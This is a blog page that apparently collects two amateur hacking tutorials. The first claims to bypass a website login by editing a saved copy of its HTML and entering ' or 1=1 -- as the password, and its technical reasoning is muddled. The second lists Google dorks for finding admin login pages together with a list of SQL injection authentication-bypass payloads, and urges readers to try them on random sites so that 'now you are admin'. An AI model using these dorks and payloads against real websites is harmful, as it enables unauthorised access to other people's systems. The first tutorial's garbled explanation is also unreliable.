Popular Post

Showing posts with label sql injection. Show all posts

hack Website with Basic HTML Coding

By : Unknown

hack Website with Basic HTML Coding

Edited by June, Chris Hadley, Max1508, Skycaptain95 and 59 others
If you have basic HTML and JavaScript knowledge, you may be able to access password protected websites. This article will give you an easy method to hack simple, less-secured websites of your choice simply through HTML. Use it responsibly.

Note: This basic method works only for websites with extremely low security barriers. Websites with robust security details will not be susceptible to this kind of simple attack
Steps
  1. Hack a Website with Basic HTML Coding Step 1.jpg
    1
    Open the site you want to hack. Provide wrong username/password combination in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here.

    2
    Right click anywhere on that error page =>> go to view source.
  2. Hack a Website with Basic HTML Coding Step 3.jpg
    3
    There you can see the HTML coding with JavaScript.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")
  3. Hack a Website with Basic HTML Coding Step 4.jpg
    4
    Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)
  4. Hack a Website with Basic HTML Coding Step 5.jpg
    5
    Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=password>" with "<_type=text>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )
  5. Hack a Website with Basic HTML Coding Step 6.jpg
    6
    Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)
  6. Hack a Website with Basic HTML Coding Step 7.jpg
    7
    Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.
  7. Hack a Website with Basic HTML Coding Step 8.jpg
    8
    Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.
Read More
0 Comments
Tag : , , ,

easiest method without any software....sql injection...

By : Unknown

Exploiting Web Applications by SQL Injection (Step By Step Tutorial)

Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries.

                     


What is SQL Injection?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

                    
 

[Step – 1] Find SQL Injection Vulnerable Website

First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.


1) By Google Dork
Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.


There is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp





after this you will see  many websites in google search ..
try the sql injection on these...







[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.
‘or’’=’

admin'--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --
after this when you are redirected to login page of any website found in google search by these
inurl:admin.asp
inurl:login/admin.asp     e.t.c



when you saw login 
enter username =admin
and
password=' or '1'='1
type it carefully and now your are admin enjoy and be carefull...
Read More
0 Comments
Tag : , , ,
Powered by Blogger.
Top | Home | About | Write For Us | Contact | Privacy Policy | Term Of Use | Sitemap
Copyright © 2014 kuch.in All Rights Reserved. Designed by Ashacks Team